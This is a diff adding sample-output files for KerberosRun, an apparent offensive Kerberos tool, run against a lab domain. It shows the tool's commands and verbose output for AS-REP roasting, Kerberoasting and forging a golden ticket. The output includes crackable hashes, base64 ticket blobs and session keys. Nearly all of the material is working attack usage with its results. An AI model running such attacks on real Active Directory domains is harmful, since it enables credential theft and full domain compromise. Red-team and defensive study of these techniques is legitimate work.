+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261654
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Receiving AS-REP...
+[+] ASREPRoasting Hash: $krb5asrep$23$normaluser@corplab.local:29D78179FA685E862D40EEAE60F97558$DE3E0F7C41C7C0D80B62E93F5FED7FB0CF8C8B197B6F163360E447F71F669A484D164426CB9855F40684FEC8827EED3A37BB0A8EC646CB3470468A9F8B8065FF86ABDCA096B1B7C0341732FC8DCCFAED97F8F09AD194324EC7408FAC6B7EEC34F9AAB3A1A66C76B45A671F29F84E3FD45EFA7F15A9D9F30EFEDF5BFDAC8388BA96A50EB767638B252E649AAE83DE57E06692857FED01AC37DCD73F460B43FE3A57501BCEB916B4EF92886138A6BFC0D0C2ADFDB9057283A472EEA71BDB17C17C707E99B4C30429563801EF60743A973C307FEBAF60D0798616143DFC5E85EC03F1801B1A7625B234BAE00CC616A4CA55D5DA8D6E01C663CE365A38E0C77BD288CE9DE898A4CA1C1805F7BD87DD4176D7FEA39833D4511BB72DC7F4B3665B2211DB2276FA74CB95BE6EAF05367C557067BC198600E4A780
+[+] Done! Now enjoy your hash.
+
+```
\ No newline at end of file
diff --git a/Authentication/Samples/Golden.md b/Authentication/Samples/Golden.md
new file mode 100644
index 0000000..c7ea237
--- /dev/null
+++ b/Authentication/Samples/Golden.md
@@ -0,0 +1,168 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --golden --rc4 [...] --domainsid  S-1-5-21-1977317821-1772133574-954835042 --user dev2null  --domain corplab.local --verbose      
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+
+[*] Building Golden Ticket ...
+[*] Building PAC ...
+[*] Decrypting Golden Ticket ...
+       - AuthTime :  5/27/2020 8:40:06 AM +00:00
+       - StartTime :  5/27/2020 8:40:06 AM +00:00
+       - EndTime :  5/27/2020 6:40:06 PM +00:00
+       - RenewTill :  6/3/2020 8:40:06 AM +00:00
+       - CRealm :  corplab.local
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  dev2null
+       - AuthorizationData :
+          - Type :  AdIfRelevant
+             - Type :  AdWin2kPac
+                - Type :  AdWin2kPac
+                - Version :  0
+                - LogonInfo :
+                   - PacType :
+                   - DomainId :
+                      - Revision :  1
+                      - IdentifierAuthority :  NTAuthority
+                      - SubAuthority :  21, 1977317821, 1772133574, 954835042
+                      - SubAuthorityCount :  4
+                   - ExtraIds :
+                   - DomainSid :
+                      - Attributes :  0
+                      - Id :  954835042
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042
+                   - ExtraSidCount :  0
+                   - ExtraSids :
+                   - GroupCount :  5
+                   - GroupId :  513
+                   - GroupIds :
+                      - RelativeId :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                   - GroupSid :  S-1-5-21-1977317821-1772133574-954835042-513
+                   - GroupSids :
+                      - Id :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-513
+                      - Id :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-512
+                      - Id :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-520
+                      - Id :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-518
+                      - Id :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-519
+                   - HomeDirectory :
+                   - HomeDrive :
+                   - KickOffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LastFailedILogon :  1/1/1601 8:00:00 PM +00:00
+                   - LastSuccessfulILogon :  1/1/1601 8:00:00 PM +00:00
+                   - LogoffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LogonCount :  0
+                   - LogonScript :
+                   - LogonTime :  5/27/2020 8:40:06 AM +00:00
+                   - ProfilePath :
+                   - PwdCanChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - PwdLastChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - PwdMustChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - Reserved1 :  0, 0
+                   - Reserved3 :  0
+                   - ResourceDomainId :
+                   - ResourceDomainSid :
+                   - ResourceGroupCount :  0
+                   - ResourceGroupIds :
+                   - ResourceGroups :
+                   - SubAuthStatus :  0
+                   - UserAccountControl :  ADS_UF_LOCKOUT, ADS_UF_NORMAL_ACCOUNT
+                   - UserDisplayName :
+                   - UserFlags :  LOGON_EXTRA_SIDS
+                   - UserId :  500
+                   - UserName :  dev2null
+                   - UserSessionKey :  00000000000000000000000000000000
+                   - UserSid :  S-1-5-21-1977317821-1772133574-954835042-500
+                   - DomainName :  CORPLAB.LOCAL
+                   - ServerName :
+                   - BadPasswordCount :  0
+                   - FailedILogonCount :  0
+                - ClientInformation :
+                   - PacType :  CLIENT_NAME_TICKET_INFO
+                   - ClientId :  5/27/2020 8:40:06 AM +00:00
+                   - Name :  dev2null
+                   - NameLength :  16
+                - KdcSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  2F0C2967859182C58980DD630162E402
+                   - SignatureData :  [...]
+                   - Type :  KERB_CHECKSUM_HMAC_MD5
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  2F0C2967859182C58980DD630162E402
+                - ServerSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  7630D328EFCF3CF5C33E89B541943405
+                   - SignatureData :  [...]
+                   - Type :  KERB_CHECKSUM_HMAC_MD5
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  7630D328EFCF3CF5C33E89B541943405
+                - DecodingErrors :
+                - HasRequiredFields :  True
+       - CAddr :
+       - Flags :  PreAuthenticated, Initial, Renewable, Forwardable
+       - Key :
+          - EType :  RC4_HMAC_NT
+          - Value :  74BD7F0486EA08C51A3A8B2C2E0932EF
+       - Transited :
+          - Type :  0
+          - Contents :
+[*] Now you have a Golden Ticket!
+[+] Golden Ticket Kirbi:
+    - doIEkzCCBI+gAwIBBaEDAgEWooIDpTCCA6FhggOdMIIDmaADAgEFoQ8bDWNvcnBsYWIubG9jYWyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDWNvcnBsYWIubG9jYWyjggNbMIIDV6ADAgEXooIDTgSCA0rNykYDP5cVY8oxm58Ec1cedMZsO2kw3ZUpuVBvULe6TFULEn33nlh9pF5JeiakXuJCh/QEipxx+Dqtj2BrWmoJ0JmHWgO28ykT1jrFjC80Riua5ATWt59y0sSYnr8M66oVZb9sKbsco89xcES/stBHt8h1zODN6kq9p3TOw3bAiWPSrlkFMFiypCppZT09133aAoN2QaChguCAM9RWuR3avzlNv1oqZN8fdj9DsMCvDmefWK5hFjokj+dC1Ji1ApCt3EnZPfXKm0zmC7l7kDyLLMAwBOWXuH7AzUf84b7b9RaX32jxUCkI1+B8ubZJaaOBSZub1D37W4uShs6nuB1upZuzyjkmPZ331lrrLCfmvqH3LVoqkosJMc5bMMoekh2KSX811EP+hBJD9ARe42C/eN3lOdbwjX1YhBj1FrDj8ZycZUJ/SNsI5ph9fIiFiMehAzalRpsdJPIt0UrSIwNnBHBJ54b+HpvuNmejo4rf5Rc4TRSoWgCSb3AkyEvcJrJ87A0PK1w9IKvQaO7DIRONFiEjQM39xc+pUOesAFuCV4xQ78tU+khcvZxVhPXAoC1pTvEgkY/8fQCe+o3SX+m0g1vhjh+dgdMa50HVeYmCQn1njD4jhK0ZPH1dHaGOy1Umre1OoL+knGfwfLFJZrOf2kacQTwChn0HLDYGrrxqubWsuLAiZ3DnR4UV5+rVZ9o4Wij9aKzx0wk5au5StmTy3bHaNeifBm1uczQtOtzFdmRWh7SLR4CR+DcLQxz83/7ROr8BH3k3UqMvX1lPTSuhOZVMwMpvfQ/7UWFyRG8ONGygBhmdKtASds63pI3Z9ZXzTMM2EhYKzHcc1LNyYrCw+deaacHvPtHKpKdhqzUITQiCgVUBzrrNk7w03t8GsGWhEh0QMKfr54o5N3iW19aWFRzQyKMQfwtMYNTtV+cnxd8J0zkQ9r36bOJftDj2zY8kVFGaxkJZYOIKJ++2UEK4O/OWtuXiQbsnLDBkFRL+6iHy4RBPVdFk5DAptic8zz49uLd81FILLarBtNixBY7WlMD/hF2daPPVUsoqLeyB98WxYvzcU+c73LUt+eo7CpyDXzyZI75WGONVNERNSLtbZ373gDW/JF9LqaOB2TCB1qADAgEAooHOBIHLfYHIMIHFoIHCMIG/MIG8oBswGaADAgEXoRIEEHS9fwSG6gjFGjqLLC4JMu+hDxsNY29ycGxhYi5sb2NhbKIVMBOgAwIBAaEMMAobCGRldjJudWxsowcDBQBA4AAApREYDzIwMjAwNTI3MDg0MDA2WqYRGA8yMDIwMDUyNzE4NDAwNlqnERgPMjAyMDA2MDMwODQwMDZaqA8bDWNvcnBsYWIubG9jYWypIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDWNvcnBsYWIubG9jYWw=
+[*] Ticket Info:
+    * KRB_CRED
+    * pvno :  5
+    * Tickets :  Kerberos.NET.Entities.KrbTicket
+    * Encrypted Data :
+       - Timestamp :
+       - USec :
+       - SAddress :
+       - RAddress :
+       - Nonce :
+       - Ticket Info :
+          - Realm :  corplab.local
+          - PName :
+             - Type :  NT_PRINCIPAL
+             - Name :  dev2null
+          - Flags :  PreAuthenticated, Initial, Renewable, Forwardable
+          - AuthTime :
+          - StartTime :  5/27/2020 8:40:06 AM +00:00
+          - EndTime :  5/27/2020 6:40:06 PM +00:00
+          - RenewTill :  6/3/2020 8:40:06 AM +00:00
+          - SRealm :  corplab.local
+          - SName :
+             - Type :  NT_SRV_INST
+             - Name :  krbtgt
+          - Key :
+             - EType :  RC4_HMAC_NT
+             - KeyValue :  74BD7F0486EA08C51A3A8B2C2E0932EF
+[+] Done! Now enjoy your ticket.
+```
\ No newline at end of file
diff --git a/Authentication/Samples/Kerberoast.md b/Authentication/Samples/Kerberoast.md
new file mode 100644
index 0000000..77212f1
--- /dev/null
+++ b/Authentication/Samples/Kerberoast.md
@@ -0,0 +1,205 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --kerberoast --user normaluser --pass [...] --spn time/win10.corplab.local --verbose
+
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+[*] Starting Kerberos Authentication ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261654
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261655
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Receiving AS-REP...
+    * MessageType :  KRB_AS_REP
+    * pvno :  5
+    * PaData :
+       - PA_ETYPE_INFO2 :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - S2kParams :
+          - Salt :  CORPLAB.LOCALnormaluser
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  normaluser
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  krbtgt
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  11
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [krbtgtEncryptedCipher...]
+    * Enc-Part :
+       - kvno :  6
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - Cipher :  [ClientEncryptedCipher...]
+[+] TGT Kirbi:
+    - doIFHDCCBRigAwIBBaEDAgEWooIEHDCCBBhhggQUMIIEEKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUNPUlBMQUIuTE9DQUyjggPSMIIDzqADAgESoQMCAQuiggPABIIDvKgwU3Uw2GAEBrfsxkiO7dC96zU75hz/eieHDv7PuJVeZk818/uCowvdeD6owsHYqq05Ju1vmJgDOOKZscQzerxIRpoikQp0LR6qw19lRRc4TRdPbYgjbIT5Ww+BPknPR70kcVq7lZQ9zIwKFHkBrVTKROzEOQDAdENvcQM18qqVFB4xXUmCkIAdxj899JwU/VlZxZk1jS6coyieP89UOg1C3LCq8wYGhLUuxQMahQP4sWiGzsUsVJz/YWkTR1yAibVSq7krVxeIYnK9hilvBDDOJa6PusSGWRxFFFFsLCJbnY+hk6J0tyJyhVKYDsQz+kfC3Uu5yB4GV8wucA357zMHSAcuKL3gS0IGzNWS0+qATkrVkHfMNWSicCw2ZkoFjotLDxedqvQIuXnwJHMU1RSrIUYOEn/+S+Y1CCPjhzYgUaU4lz6de/i2SLaYHVP15fcOOsUnDsLeJWdmwXSYzzhjCRjOBdm8xq0+s0LrR56Sa2zTW7432U/96XeznojWPnJOt/Isw/6sK0YpeX5wBMDh+n+ckRooMleuslS/uE3c/l3AVdeQayXvRquacNVIJSOzl3aN49GDe8z2+omemQNKlqgGvsbxlwBjFwExtZ5DWTrvvSeChd2Or52xu51HfpExSvOOfuj5mLotbsNjBsjx9sFn9SqIlCgztfzxMDj2ksT3fexL4F56hvqZHTs+DrbZ5eBPF4exdDMXx8eVz5SdEsBxe+rpxiywjqpWefQOqWczptm4I8YYMA3zgmaXSmevNBE9ZcmruO5J1T2aZ7Ds9OIHuu8wzI9hlviHAOZRpRS+oAdTOQhzrj3pkIotBTRC8ui/L1ZcMgrvJmP9MxXMIpjBhwMhRWDBoOxmccljMPwyefaEuXvPIQjqu7fz6ZdJpD5Jer38Vh/Hm38btTj+xPuTwKJt11k3eGT2mt6AIp5/se2kD2ngRNbYZ1Cth/+tjZGvsIgnuYhEK+GlTr1mctk8lS8B6x91kYlvDcPPcPT/evZTR0Knz0LV0PIYDY6yWLbeLnJsILSBMiqLanOa2V6GEh2VfESrt5bZjMe09o+5lLpJOhKVwwl2owQouqXIaMrQ+GETocmK1PuIVdzcEO/2e61hxntdA7jUA8di39pBsgRbiYo3Z5mj9dxjUs4iMdMEAOBYXz24MlX9GEz0tg6ESb78yXhXVs8+Om12iFJpkYt2XEA0lTgq/HT4iqHQAISOMKsi7Ea1sDLSGHiWe/PXh/aJcJ6CwouNjzU+3kZR77gSSDCQV4WLo4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQg7sY+Amc6KpoQ7LwRT5OL9iaRdK92Bd0hCewFSK6gvXShDxsNQ09SUExBQi5MT0NBTKIXMBWgAwIBAaEOMAwbCm5vcm1hbHVzZXKjBwMFAEDBAAClERgPMjAyMDA1MjcwODM1NDRaphEYDzIwMjAwNTI3MTgzNTQ0WqcRGA8yMDIwMDYwMzA4MzU0NFqoDxsNQ09SUExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNQ09SUExBQi5MT0NBTA==
+[*] Sending TGS-REQ ...
+    * MessageType :  KRB_TGS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_TGS_REQ :
+          - KRB_AP_REQ :
+             - pvno :  5
+             - ApOptions :  Reserved
+             - Ticket :
+                - tkt-vno :  5
+                - Realm :  CORPLAB.LOCAL
+                - SName :
+                   - Type :  NT_SRV_INST
+                   - Name :  krbtgt
+                   - Name :  CORPLAB.LOCAL
+                - EncryptedPart :
+                   - kvno :  11
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - Cipher :  [krbtgtEncryptedCipher...]
+             - Authenticator :
+                - kvno :
+                - EType :  AES256_CTS_HMAC_SHA1_96
+                - Realm :  CORPLAB.LOCAL
+                - SequenceNumber :  637261657
+                - Subkey :
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - KeyValue :  DE60412E51655270CE5AE28FACA042A371ACC4D86F2B50151CAD82593DC16205
+                - CTime :  5/27/2020 8:35:44 AM +00:00
+                - CuSec :  607
+                - CName :
+                   - Type :  NT_PRINCIPAL
+                   - Name :  normaluser
+                - Checksum :
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Checksum :  8EDD9072494F2981798F23A7
+                - AuthorizationData :
+                - AuthenticatorVersionNumber :  5
+       - PA_PAC_OPTIONS :
+          - Flags :  BranchAware
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - Realm :  corplab.local
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  time
+          - Name :  win10.corplab.local
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :
+       - Nonce :  637261656
+       - EType :
+          - EncType :  RC4_HMAC_NT
+       - EncAuthorizationData :
+       - From :
+       - AdditionalTickets :
+[*] Receiving TGS-REP ...
+    * MessageType :  KRB_TGS_REP
+    * pvno :  5
+    * PaData :
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  normaluser
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  time
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  5
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [ServiceEncryptedCipher...]
+    * Enc-Part :
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - kvno :
+       - Cipher :  [SubSessionKeyEncryptedCipher..]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:35:44 AM +00:00
+       - StartTime :  5/27/2020 8:35:44 AM +00:00
+       - EndTime :  5/27/2020 6:35:44 PM +00:00
+       - RenewTill :  6/3/2020 8:35:44 AM +00:00
+       - Nonce :  637261656
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  time
+          - Name :  win10.corplab.local
+       - EncryptedPaData :
+          - PA_SUPPORTED_ETYPES :
+             - Value : 1F000000
+          - PA_PAC_OPTIONS :
+             - Flags :  BranchAware
+       - Key :
+          - EType :  RC4_HMAC_NT
+          - Value :  81DBE44422621BBDBEB4EEBFB72B92BA
+       - KeyExpiration :
+       - Flags :  EncryptedPreAuthentication, Renewable, Forwardable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:35:44 AM +00:00
+[+] TGS Kirbi:
+    - doIFBDCCBQCgAwIBBaEDAgEWooIEEDCCBAxhggQIMIIEBKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiJjAkoAMCAQKhHTAbGwR0aW1lGxN3aW4xMC5jb3JwbGFiLmxvY2Fso4IDwjCCA76gAwIBEqEDAgEFooIDsASCA6witQMKXQl+xCRO96HZ7ew8L78k8f9vbViK5/pEamEK7O5jk5g1oG921hyZR3b2wkVr8kyWxva9KbrWvpWpDJYrikje4NlvS2L+wFGb1NRDA4ooIckhK0nTWNVcfhbsrD/VEcPVmo/B2NDawiqQiyElWMTZT7nVZYD3bB2emFolqjjW0dQ6/NnA3/mgKwB0utzaVviTz3Cjg5u/8e5u+Aascoswcp5WHNELiaUhNdwKM6MkYDhoOpHZO05LkcFjuSYKhUeUvQq6IKkerRPwcR10Q8xS4PnHRU90Y+MQpwrbfrut3udU0EhZnA4Y2Pi6TXDdgiaXUr2N/uiJy6XiONcvDWrECCfsN+Ci3Lj9N+fmq02UkANZWbdh4CGXn9lnz0LbrYqhmCzxtQ/zwItJ+Vhj/tPxjQZrS9t1z8P4b5UAzUbHHCo+oufyA2aCHMkxBJTR23lsGZKbVUh4x9XnrGfwp7ZGZ3TB0ffie4+/DZFC3K0sU1yd6dCHLF8bSYJ8VMsPyMPCF9fD243IetaAaLSdZHaEMAK+h+4qfLwm/ZPFtqTYNapSD5gQQZYh2myfi+C2FcF10Nhuxl9WZVFWbWsnLpJpjqgFz8WoDPwtufoqlnO3Vy8sscD6GAFVLp4ux53UklIpo2hmkUHuMiXUDVmhUpqIpID4opwJzMoBxv6D1O/zSeGI1ax7uKvx3MjnpB2G+M8gI/M/gx5RfMdwVbkVVqSu3taLc8udqMjgCYY48MVJf/2nLcgwuo1+H8yRD/lw/DnrtRjooOSblk57U3sPYC3h//b5/8TWnAckoCqZj+UlxAFOn8crycwWlQCWZ4bUEVTbbYs69JuG78wv0dRDSQc0nViYNuSplecUxEb6MjHg9J8MMWyfsOYhN1n0vSsLa3DPmSyJStwS9Gis3z5Es9mxY3NK9J2gdF9KupzNUsSbH+RXpB3oB1KqvwvKgdlhkDyYixtI6A4Yg+t1lDWxExVk4QYdqGIDCw/+kAU4I2k891uNrFsnDe9n5AD2OEQVwCEuF1MsDnLWm3ovpVqGJzR8IP7txyDfSp4zWt4P4n4FaVGeVHhYkWDbiFIDQ8VclUd8Nf02Ajq8HH0KIf83s54SjzzEfYjzYcKSzPOVCICpvdvtM50S6d616tp7C61OOou5V+QHZpjGr9OG89axOjkcfQc7xtkkjUY/dgsWkVG5SwK7vAj6p7UQICJmgGGIl56mHIPlFp7C+aq6VBJckgfph1iAy/KGWQXPo4HfMIHcoAMCAQCigdQEgdF9gc4wgcuggcgwgcUwgcKgGzAZoAMCARehEgQQgdvkRCJiG72+tO6/tyuSuqEPGw1DT1JQTEFCLkxPQ0FMohcwFaADAgEBoQ4wDBsKbm9ybWFsdXNlcqMHAwUAQIEAAKURGA8yMDIwMDUyNzA4MzU0NFqmERgPMjAyMDA1MjcxODM1NDRapxEYDzIwMjAwNjAzMDgzNTQ0WqgPGw1DT1JQTEFCLkxPQ0FMqSYwJKADAgECoR0wGxsEdGltZRsTd2luMTAuY29ycGxhYi5sb2NhbA==
+[+] Kerberoasting Hash: $krb5tgs$18$*normaluser$corplab.local$time/win10.corplab.local*$22B5030A5D097EC4244EF7A1D9EDEC3C$2FBF24F1FF6F6D588AE7FA446A610AECEE63939835A06F76D61C994776F6C2456BF24C96C6F6BD29BAD6BE95A90C962B8A48DEE0D96F4B62FEC0519BD4D443038A2821C9212B49D358D55C7E16ECAC3FD511C3D59A8FC1D8D0DAC22A908B212558C4D94FB9D56580F76C1D9E985A25AA38D6D1D43AFCD9C0DFF9A02B0074BADCDA56F893CF70A3839BBFF1EE6EF806AC728B30729E561CD10B89A52135DC0A33A3246038683A91D93B4E4B91C163B9260A854794BD0ABA20A91EAD13F0711D7443CC52E0F9C7454F7463E310A70ADB7EBBADDEE754D048599C0E18D8F8BA4D70DD82269752BD8DFEE889CBA5E238D72F0D6AC40827EC37E0A2DCB8FD37E7E6AB4D9490035959B761E021979FD967CF42DBAD8AA1982CF1B50FF3C08B49F95863FED3F18D066B4BDB75CFC3F86F9500CD46C71C2A3EA2E7F20366821CC9310494D1DB796C19929B554878C7D5E7AC67F0A7B6466774C1D1F7E27B8FBF0D9142DCAD2C535C9DE9D0872C5F1B49827C54CB0FC8C3C217D7C3DB8DC87AD68068B49D6476843002BE87EE2A7CBC26FD93C5B6A4D835AA520F9810419621DA6C9F8BE0B615C175D0D86EC65F566551566D6B272E92698EA805CFC5A80CFC2DB9FA2A9673B7572F2CB1C0FA1801552E9E2EC79DD4925229A368669141EE3225D40D59A1529A88A480F8A29C09CCCA01C6FE83D4EFF349E188D5AC7BB8ABF1DCC8E7A41D86F8CF2023F33F831E517CC77055B91556A4AEDED68B73CB9DA8C8E0098638F0C5497FFDA72DC830BA8D7E1FCC910FF970FC39EBB518E8A0E49B964E7B537B0F602DE1FFF6F9FFC4D69C0724A02A998FE525C4014E9FC72BC9CC169500966786D41154DB6D8B3AF49B86EFCC2FD1D4434907349D589836E4A995E714C446FA3231E0F49F0C316C9FB0E6213759F4BD2B0B6B70CF992C894ADC12F468ACDF3E44B3D9B163734AF49DA0745F4ABA9CCD52C49B1FE457A41DE80752AABF0BCA81D961903C988B1B48E80E1883EB759435B1131564E1061DA862030B0FFE90053823693CF75B8DAC5B270DEF67E400F6384415C0212E17532C0E72D69B7A2FA55A8627347C20FEEDC720DF4A9E335ADE0FE27E0569519E5478589160DB88520343C55C95477C35FD36023ABC1C7D0A21FF37B39E128F3CC47D88F361C292CCF3950880A9BDDBED339D12E9DEB5EADA7B0BAD4E3A8BB957E4076698C6AFD386F3D6B13A391C7D073BC6D9248D463F760B169151B94B02BBBC08FAA7B510202266806188979EA61C83E5169EC2F9AABA54125C9207E9875880CBF2865905CF
+[+] Done! Now enjoy your hash.
